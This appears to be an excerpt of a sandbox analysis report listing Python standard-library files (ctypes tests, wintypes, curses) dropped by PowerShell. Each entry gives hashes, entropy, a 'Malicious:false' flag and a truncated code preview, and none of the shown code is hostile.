                                                                                                                                                                                                            Preview:import unittest..from test import support..from ctypes import *....import _ctypes_test....lib = CDLL(_ctypes_test.__file__)....class StringPtrTestCase(unittest.TestCase):.... @support.refcount_test.. def test__POINTER_c_char(self):.. class X(Structure):.. _fields_ = [("str", POINTER(c_char))].. x = X().... # NULL pointer access.. self.assertRaises(ValueError, getattr, x.str, "contents").. b = c_buffer(b"Hello, World").. from sys import getrefcount as grc.. self.assertEqual(grc(b), 2).. x.str = b.. self.assertEqual(grc(b), 3).... # POINTER(c_char) and Python string is NOT compatible.. # POINTER(c_char) and c_buffer() is compatible.. for i in range(len(b)):.. self.assertEqual(b[i], x.str[i]).... self.assertRaises(TypeError, setattr, x, "str", "Hello, World").... def test__c_char_p(self):.. class X(Structure):.. _fields_ = [("str", c_char_p)]..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7535
                                                                                                                                                                                                            Entropy (8bit):4.8580903375813005
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:FxS64toyDIJpcLeLDD6fZBXn/BWHIMPEj8nwIMNtvll1l47uTq:2O10vnpWHZEAnwLl1FTq
                                                                                                                                                                                                            MD5:6E9442A4F323A8053C2887369858DE62
                                                                                                                                                                                                            SHA1:C0EC31CFC3D0DCE066A62C29541FD8BCB0A5E0FB
                                                                                                                                                                                                            SHA-256:F312AC370A7F1E9229F21BF0729513C7347933320BFB3A702F0D0438B4F773BB
                                                                                                                                                                                                            SHA-512:33F0C6CA2494E2702C5962791B291F72FBB4DFBD758603C55C27157B76920A2EA813605D4AA213F1A132CEF607532FF73BC67C806BD5F84EF33BB95A29F5FB54
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import unittest..from ctypes import *..from ctypes.test import need_symbol....class StringArrayTestCase(unittest.TestCase):.. def test(self):.. BUF = c_char * 4.... buf = BUF(b"a", b"b", b"c").. self.assertEqual(buf.value, b"abc").. self.assertEqual(buf.raw, b"abc\000").... buf.value = b"ABCD".. self.assertEqual(buf.value, b"ABCD").. self.assertEqual(buf.raw, b"ABCD").... buf.value = b"x".. self.assertEqual(buf.value, b"x").. self.assertEqual(buf.raw, b"x\000CD").... buf[1] = b"Z".. self.assertEqual(buf.value, b"xZCD").. self.assertEqual(buf.raw, b"xZCD").... self.assertRaises(ValueError, setattr, buf, "value", b"aaaaaaaa").. self.assertRaises(TypeError, setattr, buf, "value", 42).... def test_c_buffer_value(self):.. buf = c_buffer(32).... buf.value = b"Hello, World".. self.assertEqual(buf.value, b"Hello, World").... self.assertRaises(TypeError, set
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3081
                                                                                                                                                                                                            Entropy (8bit):4.469260302043113
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:FrDYEYhCGbNBCJwALc1nFcpiwBWTDWYyyXwOBGXo5ApGu0chcHcTxcz3A:Fr0lhLBCVLcncgwQ/ymwC6JzS8mTA
                                                                                                                                                                                                            MD5:FAC90AB620E09149FC2DB75A69CED86C
                                                                                                                                                                                                            SHA1:E7FFE38C76F66735B9639E20F82579F52BBC6EAF
                                                                                                                                                                                                            SHA-256:597B4F9570BDDFFA4F8708BEE830AEAD46795CC88BB9AC6F2604F176B532F9D1
                                                                                                                                                                                                            SHA-512:DF1AE47265334243D0A77F19BE93D3FB37C17727A10C0AA2638A756871E355E4BB8ABA69A6AECC497EF13F6A87A602AEEB1634C1483456983225763E69432B47
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import unittest..from ctypes import *....class StructFieldsTestCase(unittest.TestCase):.. # Structure/Union classes must get 'finalized' sooner or.. # later, when one of these things happen:.. #.. # 1. _fields_ is set... # 2. An instance is created... # 3. The type is used as field of another Structure/Union... # 4. The type is subclassed.. #.. # When they are finalized, assigning _fields_ is no longer allowed..... def test_1_A(self):.. class X(Structure):.. pass.. self.assertEqual(sizeof(X), 0) # not finalized.. X._fields_ = [] # finalized.. self.assertRaises(AttributeError, setattr, X, "_fields_", []).... def test_1_B(self):.. class X(Structure):.. _fields_ = [] # finalized.. self.assertRaises(AttributeError, setattr, X, "_fields_", []).... def test_2(self):.. class X(Structure):.. pass.. X().. self.assertRaises(AttributeError, setattr, X, "_fields_", []
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):28224
                                                                                                                                                                                                            Entropy (8bit):4.53668347437258
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:hkcvzkA/zazm9Hz/jAJyU+wM7eqNgoZOMdY+:hkcbkiOIU+wM7pg0OMdT
                                                                                                                                                                                                            MD5:A6F0A42E68FD33545C395893D71D4FCE
                                                                                                                                                                                                            SHA1:289960881696CAD7F6927A1A9E2529BCC48232D6
                                                                                                                                                                                                            SHA-256:E7C4248F166691D2BD69B00A73CD269E9A4B27B3C8C8608E4ED8EB4C205024EC
                                                                                                                                                                                                            SHA-512:D504B27392BA088A5BEB05AC4E0C31C34026076E1071DFC17BCFF9F47F90B730C7060A76BC0135B7C149AA1628366B182C0175C9DC89476A4EAA2E50C97844C7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import platform..import sys..import unittest..from ctypes import *..from ctypes.test import need_symbol..from struct import calcsize..import _ctypes_test..from test import support....# The following definition is meant to be used from time to time to assist..# temporarily disabling tests on specific architectures while investigations..# are in progress, to keep buildbots happy...MACHINE = platform.machine()....class SubclassesTest(unittest.TestCase):.. def test_subclass(self):.. class X(Structure):.. _fields_ = [("a", c_int)].... class Y(X):.. _fields_ = [("b", c_int)].... class Z(X):.. pass.... self.assertEqual(sizeof(X), sizeof(c_int)).. self.assertEqual(sizeof(Y), sizeof(c_int)*2).. self.assertEqual(sizeof(Z), sizeof(c_int)).. self.assertEqual(X._fields_, [("a", c_int)]).. self.assertEqual(Y._fields_, [("b", c_int)]).. self.assertEqual(Z._fields_, [("a", c_int)]).... def test_subcla
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1183
                                                                                                                                                                                                            Entropy (8bit):4.450969976940341
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:kXF2h4cnvRXeWboiJUJoiiEJ17eAMn6o/eAMnea1:kXF2h4ShNRHEJ1CAMntmAMnea1
                                                                                                                                                                                                            MD5:8A12F280CAB7E5B9C954D33C916D89D9
                                                                                                                                                                                                            SHA1:6DE558DDA36947D6788C29D34A6DF6569351590D
                                                                                                                                                                                                            SHA-256:31D3C262E7A6A9C78F1D4C53C1ACFAEFA6D7CDBFB6FAEFA8AB412DC1A8C0A04D
                                                                                                                                                                                                            SHA-512:63E49B38951BBBEAA1E05010DE44782EFDC78DACF1688D0F82A0ED70DE0B98A5AC8E594BBD052C2F19C77CAD2CFC2B7B9F383A02FB78ABF2C9D1FDF1913F3452
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import sys, unittest..from ctypes import *....structures = []..byteswapped_structures = []......if sys.byteorder == "little":.. SwappedStructure = BigEndianStructure..else:.. SwappedStructure = LittleEndianStructure....for typ in [c_short, c_int, c_long, c_longlong,.. c_float, c_double,.. c_ushort, c_uint, c_ulong, c_ulonglong]:.. class X(Structure):.. _pack_ = 1.. _fields_ = [("pad", c_byte),.. ("value", typ)].. class Y(SwappedStructure):.. _pack_ = 1.. _fields_ = [("pad", c_byte),.. ("value", typ)].. structures.append(X).. byteswapped_structures.append(Y)....class TestStructures(unittest.TestCase):.. def test_native(self):.. for typ in structures:.. self.assertEqual(typ.value.offset, 1).. o = typ().. o.value = 4.. self.assertEqual(o.value, 4).... def test_swapped(self):.. for typ in byteswapped_structures:..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2061
                                                                                                                                                                                                            Entropy (8bit):4.864007563538307
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:DZHNuc1EgtLaoFnUQFaMhUQpZSSd+urtxMVZ0/6Ms0T9tkWzUQdaMhUQv3BTa1:DZtWerJUMhJeSgjo/6VOF58Mh5Ra1
                                                                                                                                                                                                            MD5:E5F6FE9A18B73B09824BD89C215667C9
                                                                                                                                                                                                            SHA1:DBF290E7D26C2233941FA6E8E8FA2EBD4007623F
                                                                                                                                                                                                            SHA-256:9E390EB17E2407E9CD60BA5881FF301FD2DE4BD1BDB5C1ED8A046116260BAE2E
                                                                                                                                                                                                            SHA-512:54CF94528C9A41B960901D8F5145A7A8755545596E107E78BBC508097B75A5B318CAD6FA5308233E7EDBB634242B5DC2ECB2D4D70A2E914810B2D424A706BAFF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import unittest..import ctypes..from ctypes.test import need_symbol....import _ctypes_test....@need_symbol('c_wchar')..class UnicodeTestCase(unittest.TestCase):.. def test_wcslen(self):.. dll = ctypes.CDLL(_ctypes_test.__file__).. wcslen = dll.my_wcslen.. wcslen.argtypes = [ctypes.c_wchar_p].... self.assertEqual(wcslen("abc"), 3).. self.assertEqual(wcslen("ab\u2070"), 3).. self.assertRaises(ctypes.ArgumentError, wcslen, b"ab\xe4").... def test_buffers(self):.. buf = ctypes.create_unicode_buffer("abc").. self.assertEqual(len(buf), 3+1).... buf = ctypes.create_unicode_buffer("ab\xe4\xf6\xfc").. self.assertEqual(buf[:], "ab\xe4\xf6\xfc\0").. self.assertEqual(buf[::], "ab\xe4\xf6\xfc\0").. self.assertEqual(buf[::-1], '\x00\xfc\xf6\xe4ba').. self.assertEqual(buf[::2], 'a\xe4\xfc').. self.assertEqual(buf[6:5:-1], "").... def test_embedded_null(self):.. class TestStruct(ctypes.Str
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3972
                                                                                                                                                                                                            Entropy (8bit):4.4896141712154884
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:OFsDcPwT5oCESa7O9hx0K8nfGxsyGlz9LW5mKIZy:OIQe2OTxKexsZLW+Zy
                                                                                                                                                                                                            MD5:2924ECDDCA4595D852F0A29974608BA6
                                                                                                                                                                                                            SHA1:54E3A24E09A93434BAF3A67FD8183BA6A5B72262
                                                                                                                                                                                                            SHA-256:95667B278B9A27F03E79A121E5C0E510390F6B23BF1BE190D01E62F7FA9659BB
                                                                                                                                                                                                            SHA-512:87863AE71FBCE560EC4D6418576EDF83C7D84D1182A3CF0221874A4188007B251226192BE8887848D6D5BE8014B86DC0D263FC40B693A2FC0FEF951FBC9E6F5B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""..A testcase which accesses *values* in a dll..."""....import unittest..import sys..from ctypes import *....import _ctypes_test....class ValuesTestCase(unittest.TestCase):.... def test_an_integer(self):.. # This test checks and changes an integer stored inside the.. # _ctypes_test dll/shared lib... ctdll = CDLL(_ctypes_test.__file__).. an_integer = c_int.in_dll(ctdll, "an_integer").. x = an_integer.value.. self.assertEqual(x, ctdll.get_an_integer()).. an_integer.value *= 2.. self.assertEqual(x*2, ctdll.get_an_integer()).. # To avoid test failures when this test is repeated several.. # times the original value must be restored.. an_integer.value = x.. self.assertEqual(x, ctdll.get_an_integer()).... def test_undefined(self):.. ctdll = CDLL(_ctypes_test.__file__).. self.assertRaises(ValueError, c_int.in_dll, ctdll, "Undefined_Symbol")....class PythonValuesTestCase(unittest.TestCase):
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1892
                                                                                                                                                                                                            Entropy (8bit):4.575024110345303
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1QIoLbr5NzEW14XL+9p9cbXj+9p14XL+9IS+iIyedbdt5cSJobZBvpe:ILfLzEY4XhbXU4X00RWbZlA
                                                                                                                                                                                                            MD5:16E74AE7496ABD4DD0FA2B6930AF4BA9
                                                                                                                                                                                                            SHA1:FE02FD6A0CC9A5B6283828FE770C6F5EEA53C752
                                                                                                                                                                                                            SHA-256:9413558163A098982EFCADC55B5B3FAFC6A06A66CE427745268980317A024D2D
                                                                                                                                                                                                            SHA-512:A2D8EA184CCA227D57A3564BFC4B0BD93DD86AC747254CDC6B98B8008751E2EE90926AD677D1D08DE8A559CCFC95CC534DB12A568F11006F8E790A9818300D21
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from ctypes import *..import unittest....class VarSizeTest(unittest.TestCase):.. def test_resize(self):.. class X(Structure):.. _fields_ = [("item", c_int),.. ("array", c_int * 1)].... self.assertEqual(sizeof(X), sizeof(c_int) * 2).. x = X().. x.item = 42.. x.array[0] = 100.. self.assertEqual(sizeof(x), sizeof(c_int) * 2).... # make room for one additional item.. new_size = sizeof(X) + sizeof(c_int) * 1.. resize(x, new_size).. self.assertEqual(sizeof(x), new_size).. self.assertEqual((x.item, x.array[0]), (42, 100)).... # make room for 10 additional items.. new_size = sizeof(X) + sizeof(c_int) * 9.. resize(x, new_size).. self.assertEqual(sizeof(x), new_size).. self.assertEqual((x.item, x.array[0]), (42, 100)).... # make room for one additional item.. new_size = sizeof(X) + sizeof(c_int) * 1.. resize(x, new_size)..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5163
                                                                                                                                                                                                            Entropy (8bit):4.724115766570873
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:8shqmGzkIUbm5bA+nyHmrmcQB0qmrVhXkJPJmftI0y:YkIUEA6y1cQyTXkJPJay
                                                                                                                                                                                                            MD5:D071F631263D91D552C0B3471B9C14E7
                                                                                                                                                                                                            SHA1:F4DF20736BB8E4558ABE8BADAC9CF9D255F6D77C
                                                                                                                                                                                                            SHA-256:6EADD6476638A4D96E57559107552FCA96B932525D8522670E639659AF864604
                                                                                                                                                                                                            SHA-512:A63B8FD5DA9CCE00CC9B7F91217BA09401D907C80CDCFAF38D2124B18A20033A233C23B51AF292C165EFBD243D79AC397D925E86747D6DF48129D5D64CEE32BD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Windows specific tests....from ctypes import *..import unittest, sys..from test import support....import _ctypes_test....@unittest.skipUnless(sys.platform == "win32", 'Windows-specific test')..class FunctionCallTestCase(unittest.TestCase):.. @unittest.skipUnless('MSC' in sys.version, "SEH only supported by MSC").. @unittest.skipIf(sys.executable.lower().endswith('_d.exe'),.. "SEH not enabled in debug builds").. def test_SEH(self):.. # Disable faulthandler to prevent logging the warning:.. # "Windows fatal exception: access violation".. with support.disable_faulthandler():.. # Call functions with invalid arguments, and make sure.. # that access violations are trapped and raise an.. # exception... self.assertRaises(OSError, windll.kernel32.GetModuleHandleA, 32).... def test_noargs(self):.. # This is a special case on win32 x64.. windll.user32.GetDesktopWindow()......@unittest.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1440
                                                                                                                                                                                                            Entropy (8bit):4.787552984860967
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:/xd+9Lk/r6BWf0dY/t0vy/t0vaFHhudJWeNgo/JK/t0vaFpUo0vSppe:/xGLk/beY/t0vCt0vaFcyoIt0vaF2o0T
                                                                                                                                                                                                            MD5:AF98AFCA97E67DFDFC4867B0E7140B37
                                                                                                                                                                                                            SHA1:D24AD3041C2FBE1DA28717806EDA588C3A000442
                                                                                                                                                                                                            SHA-256:718F309C3903BA935D0B22EC676AD77261B1AD866E926D500FDB8CB2F65CBF97
                                                                                                                                                                                                            SHA-512:6EE74B3AF3BAD18277725E2F6A48DDCAD20244F4D5E73023C2FCB28C185303E1E5C86538A36D6D1638031B0A73F284202E5E14B4E1EBDDFFD9484838B7902AF9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import unittest....# also work on POSIX....from ctypes import *..from ctypes import wintypes......class WinTypesTest(unittest.TestCase):.. def test_variant_bool(self):.. # reads 16-bits from memory, anything non-zero is True.. for true_value in (1, 32767, 32768, 65535, 65537):.. true = POINTER(c_int16)(c_int16(true_value)).. value = cast(true, POINTER(wintypes.VARIANT_BOOL)).. self.assertEqual(repr(value.contents), 'VARIANT_BOOL(True)').... vb = wintypes.VARIANT_BOOL().. self.assertIs(vb.value, False).. vb.value = True.. self.assertIs(vb.value, True).. vb.value = true_value.. self.assertIs(vb.value, True).... for false_value in (0, 65536, 262144, 2**33):.. false = POINTER(c_int16)(c_int16(false_value)).. value = cast(false, POINTER(wintypes.VARIANT_BOOL)).. self.assertEqual(repr(value.contents), 'VARIANT_BOOL(False)').... # a
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):14255
                                                                                                                                                                                                            Entropy (8bit):4.3320309673523
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:eJqRMNQWKSUWQ2iB6NQZi2JspavNCXlkFZ:eoSeWKSUWQ1B6Np2Qa1CXlkFZ
                                                                                                                                                                                                            MD5:7C2EF43E92C48F791F1C571975BFC2D5
                                                                                                                                                                                                            SHA1:C25DA8FCDAE79CC10709030575DCDDF9F996A0C1
                                                                                                                                                                                                            SHA-256:54D572F350291473AF1C38BC3E03BD58FB71F0F1A4BDC8B629C143D544E9A56A
                                                                                                                                                                                                            SHA-512:A0A9AE757CEF9B00DC628B5268B2B0553016E7D55A44F3192F51444FAD46AA17F9E6F3F0D61FB33F84B781133E2B61EFBA9208E3D8B89AB33C3981FA9D0CDEE9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import os..import shutil..import subprocess..import sys....# find_library(name) returns the pathname of a library, or None...if os.name == "nt":.... def _get_build_version():.. """Return the version of MSVC that was used to build Python..... For Python 2.3 and up, the version number is included in.. sys.version. For earlier versions, assume the compiler is MSVC 6... """.. # This function was copied from Lib/distutils/msvccompiler.py.. prefix = "MSC v.".. i = sys.version.find(prefix).. if i == -1:.. return 6.. i = i + len(prefix).. s, rest = sys.version[i:].split(" ", 1).. majorVersion = int(s[:-2]) - 6.. if majorVersion >= 13:.. majorVersion += 1.. minorVersion = int(s[2:3]) / 10.0.. # I don't think paths are affected by minor version in version 6.. if majorVersion == 6:.. minorVersion = 0.. if majorVersion >= 6:.. return majorV
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5830
                                                                                                                                                                                                            Entropy (8bit):5.212910906342309
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:/Ig/H+tkjWHgK0WVeZMgs4EnV6V7VxiLZgV2YVvjOlXJtiJtVzq3xk5b3:PLSCsHV6V7VkLZgV2YVvoXJtiJtVG6
                                                                                                                                                                                                            MD5:E79896C3F4A4880478A06B6C5F248689
                                                                                                                                                                                                            SHA1:0014939254AB98DD51BECD1E77CA5AA814F26793
                                                                                                                                                                                                            SHA-256:F0EBC6BB351C64EADEC46014490C951A21798226BFBD487623C8630DCC0A21D8
                                                                                                                                                                                                            SHA-512:2F800888926E2D0FEBFEDD351D987A90CBC52DE39A6DA18A1A4F2BAE606C2EE2A54F7492FCB09AD4503F37FC93803768899CD84786FE16837CFD4DCC9BE5CCE2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# The most useful windows datatypes..import ctypes....BYTE = ctypes.c_byte..WORD = ctypes.c_ushort..DWORD = ctypes.c_ulong....#UCHAR = ctypes.c_uchar..CHAR = ctypes.c_char..WCHAR = ctypes.c_wchar..UINT = ctypes.c_uint..INT = ctypes.c_int....DOUBLE = ctypes.c_double..FLOAT = ctypes.c_float....BOOLEAN = BYTE..BOOL = ctypes.c_long....class VARIANT_BOOL(ctypes._SimpleCData):.. _type_ = "v".. def __repr__(self):.. return "%s(%r)" % (self.__class__.__name__, self.value)....ULONG = ctypes.c_ulong..LONG = ctypes.c_long....USHORT = ctypes.c_ushort..SHORT = ctypes.c_short....# in the windows header files, these are structures..._LARGE_INTEGER = LARGE_INTEGER = ctypes.c_longlong.._ULARGE_INTEGER = ULARGE_INTEGER = ctypes.c_ulonglong....LPCOLESTR = LPOLESTR = OLESTR = ctypes.c_wchar_p..LPCWSTR = LPWSTR = ctypes.c_wchar_p..LPCSTR = LPSTR = ctypes.c_char_p..LPCVOID = LPVOID = ctypes.c_void_p....# WPARAM is defined as UINT_PTR (unsigned type)..# LPARAM is defined as LONG_PTR (signed type
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3470
                                                                                                                                                                                                            Entropy (8bit):4.6313548180715145
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:X34viBZiikmTPnKpgaXObF6tGZqGCNj3OWPI/RWg7vCwi0eIKT5KLJghEfUwRTWi:X3xZJpaC6DheWIY6qtzIY0e29L
                                                                                                                                                                                                            MD5:63A612B59CF6205D8F5DC6984B8030C0
                                                                                                                                                                                                            SHA1:825D120E85A437872023475A70894A3E74D6023D
                                                                                                                                                                                                            SHA-256:EF71D789E173399F3F33F1EF5F5284456C9F3690779D1E597F3A92BD67C64E9C
                                                                                                                                                                                                            SHA-512:7A0666A8257FAA4D4E236E71EC63B9ECB6DFCB1F7A504EAA8E2030E99EF5AE525211DF9500CBA51DB5DE0DEE2CC0D7F913FC815B05FD2FE7331B78D1A65CCBD3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""curses....The main package for curses support for Python. Normally used by importing..the package, and perhaps a particular module inside it..... import curses.. from curses import textpad.. curses.initscr().. ......."""....from _curses import *..import os as _os..import sys as _sys....# Some constants, most notably the ACS_* ones, are only added to the C..# _curses module's dictionary after initscr() is called. (Some..# versions of SGI's curses don't define values for those constants..# until initscr() has been called.) This wrapper function calls the..# underlying C initscr(), and then copies the constants from the..# _curses module to the curses package's dictionary. Don't do 'from..# curses import *' if you'll be needing the ACS_* constants.....def initscr():.. import _curses, curses.. # we call setupterm() here because it raises an error.. # instead of calling exit() in error cases... setupterm(term=_os.environ.get("TERM", "unknown"),.. fd=_
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2646
                                                                                                                                                                                                            Entropy (8bit):4.809499880351434
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:6qKTzixq3sIkl7y52k3Z1gxDgZhl9F0zEn3vUDmAtIL6VrEJG:6taDFk3PvZhPyEn/U6AtIOVreG
                                                                                                                                                                                                            MD5:000A12324F07A03393565E9BFA3B98ED
                                                                                                                                                                                                            SHA1:BBF9FEAB904877B3FD003AEC89D4EF21436AC7C9
                                                                                                                                                                                                            SHA-256:42C4FB28EAA5A3DC8E65564B4A7FC7A352FCF775436E54A2BAA6608640434BE7
                                                                                                                                                                                                            SHA-512:FCA34F80634F598317B0026D18BABF15DCE8E7CDBA0DF814726CBC41C38880D698453A1E10260609AA2286F2996614654C94B6D913B8E765CF5AD9A25C6D6A06
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""Constants and membership tests for ASCII characters"""....NUL = 0x00 # ^@..SOH = 0x01 # ^A..STX = 0x02 # ^B..ETX = 0x03 # ^C..EOT = 0x04 # ^D..ENQ = 0x05 # ^E..ACK = 0x06 # ^F..BEL = 0x07 # ^G..BS = 0x08 # ^H..TAB = 0x09 # ^I..HT = 0x09 # ^I..LF = 0x0a # ^J..NL = 0x0a # ^J..VT = 0x0b # ^K..FF = 0x0c # ^L..CR = 0x0d # ^M..SO = 0x0e # ^N..SI = 0x0f # ^O..DLE = 0x10 # ^P..DC1 = 0x11 # ^Q..DC2 = 0x12 # ^R..DC3 = 0x13 # ^S..DC4 = 0x14 # ^T..NAK = 0x15 # ^U..SYN = 0x16 # ^V..ETB = 0x17 # ^W..CAN = 0x18 # ^X..EM = 0x19 # ^Y..SUB = 0x1a # ^Z..ESC = 0x1b # ^[..FS = 0x1c # ^\..GS = 0x1d # ^]..RS = 0x1e # ^^..US = 0x1f # ^_..SP = 0x20 # space..DEL = 0x7f # delete....controlnames = [.."NUL", "SOH", "STX", "ETX", "EOT", "ENQ", "ACK", "BEL",.."BS", "HT", "LF", "VT", "FF", "CR", "SO", "SI",.."DLE",
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5826
                                                                                                                                                                                                            Entropy (8bit):4.959924122820079
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:uuz7HHzV3jkTy3YedCYWh/1aJUEkUQgy6nIhE7Xcpo0Hbo/YsyZ1i3C:uuB9AYUUQgy6n+ysz0/YsyL4C
                                                                                                                                                                                                            MD5:46B1621C4966F8371A3DEF67C5C6D632
                                                                                                                                                                                                            SHA1:7037456C1925919F1831799C924D78B7A327E7C7
                                                                                                                                                                                                            SHA-256:4838A7369459A90C58CFA5804C824F486BFAC1B7A8AE751C7DAB5443B500695E
                                                                                                                                                                                                            SHA-512:059CFD25C38EB136F68551103470A82571D4A5EBEFB7708CAB16281B84C4ED8F4CA4C8D30FC42696B51099E33BF4319DE149AA760EFE22E7B4616A0902240CEA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
